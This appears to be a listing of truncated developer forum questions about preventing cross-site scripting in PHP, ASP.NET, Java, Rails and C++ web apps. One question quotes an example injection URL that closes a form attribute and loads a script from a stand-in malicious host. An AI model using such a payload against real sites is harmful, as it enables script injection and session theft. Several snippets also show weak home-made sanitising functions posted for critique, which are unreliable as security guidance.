Does anyone know whether a DOM Node of type Text is guaranteed not be interpreted as HTML by the browser? More details follow. Background I'm building a simple web comment system for a friend, and I've been thinking about XSS attacks. I don't think filtering or escaping HTML tags is a very elegant solution--it's too easy to come up w...
Hi, I am trying to create a website where I host my data on google spreadsheets, and show data to the user in his browser using dojo. However, I am getting the error Access to restricted URI denied" code: "1012 when the browser encounters: var stateStore = new dojox.data.CsvStore( {url: "http://spreadsheets.google.com/pub?key=p0jvMl...
I'm writing a java class which would be invoked by a servlet filter and which checks for injection attack attempts and XSS for a java web application based on Struts. The InjectionAttackChecker class uses regex & java.util.regex.Pattern class to validate the input against the patterns specified in regex. With that said, I have following...
I have some PageMethods (static methods in a page marked with <WebMethod>) defined on some pages and call them using an ajax call. This POST to the server apparently doesn't trigger the ASP.NET code that would raise HttpRequestValidationException if the data sent is deemed possible XSS, so I'd like to duplicate that checking code to run...
When outputting user input, do you only use htmlspecialchars() or are there are functions/actions/methods you also run? I'm looking for something that will also deal with XSS. I'm wondering if I should write a function that escapes user input on output or just use htmlspecialchars(). I'm looking for the generic cases, not the specific c...
Which browsers do support HttpOnly cookies, and since which version? Please see http://www.codinghorror.com/blog/archives/001167.html for a discussion of HttpOnly cookies and XSS-prevention. ...
Hi, I have a Google calendar embedded on a webpage, with events related to activities the site is organizing. Some calendar events have links that redirect the user to a page, within the same website, which has more information and the option to enroll in the event. The problem however, is that since the end of last month, Google impos...
I have a form that is accepting URLs from users in PHP. What characters should I allow or disallow? Currently I use $input= preg_replace("/[^a-zA-Z0-9-\?\:#.()\,\/\&\'\\"]/", "", $string); $input=substr($input,0,255); So, it's trimmed to 255 chars and only can include letters, numbers, and ? - _ : # ( ) , & ' " / Anything I should b...
Hello, I need to implement a simple and efficient XSS Filter in C++ for CppCMS. I can't use existing high quality filters written in PHP because because it is high performance framework that uses C++. The basic idea is provide a filter that have a while list of HTML tags and a white list of options for these tags. For example. typical H...
At the moment, I apply a 'throw everything at the wall and see what sticks' method of stopping the aforementioned issues. Below is the function I have cobbled together: function madSafety($string) { $string = mysql_real_escape_string($string); $string = stripslashes($string); $string = strip_tags($string); return $string; } However,...
We've been discussing about a client-only solution in javascript that provides means for a site visitor to annotate a page for printing and it's exploitability in terms of XSS or similar attack vector. Rationale: There's a potentially long process choosing what data to display. In order to document the steps taken, a textarea (without ...
With forms I've always used <form method="post" action="<?php echo strip_tags($_SERVER['REQUEST_URI']); ?>"> To get my forms to submit to themselves. I use striptags() in case someone links to: http://www.mysite.com/page-with-form.php?bla="><script src="http://www.nasty.com/super-nasty.js"></script><a href="# Hav...
Is it necessary to filter/escape unsafe variables in <title> or other tags in <head> to prevent XSS? ...
Where in the following C# codebehind is the potential for XSS? // Get data based on key names for (int i = 0; i < m_dataKeyNames.Length; i++) { data[i] = (string)DataBinder.Eval(container.DataItem, m_dataKeyNames[i]); } Can this be fixed? Thanks. ...
I've been struggling with a problem for a few hours now, and I would appreciate either some help in accomplishing my goal, or confirmation that what I'm trying to do is in fact impossible. I have a webapp that takes the selected text (document.getSelection()) as input, from an arbitrary webpage. While it would be possible to use a bookm...
I recently had a security audit run against one of the sites I work on. This was done with the Acunetix Web Vulnerability Scanner. This came back with a bunch of results that I'm sorting through. A lot of hits on XSS came up, but I'm not sure if they are false positives or not. Code such as: if(isset($_GET['variableNameX'])) $var_...
In my ASP web page I am displaying SSN number " name ="txtSSNID" size ="20"> The Fortify Developer tool detects this as error. How can I fix this issue. I need to display the SSN Number but the thing is it should not caught while testing in Fortify developer tool for security violations ...
I realise there are several rich text editors for jQuery but I cannot find any that have an associated class that does the filtering and cleaning required to accept the input into a database. Does such a class exist? I am particularly interested for a PHP library, but .NET would be interesting too. ...
What is the recommended way to escape HTML to prevent XSS vulnerabilities in Rails apps? Should you allow the user to put any text into the database but escape it when displaying it? Should you add before_save filters to escape the input? ...
Hi guys. I developed a web application, that permits my users to manage some aspects of a web site dynamically (yes, some kind of cms) in LAMP environment (debian, apache, php, mysql) Well, for example, they create a news in their private area on my server, then this is published on their website via a cURL request (or by ajax). The n...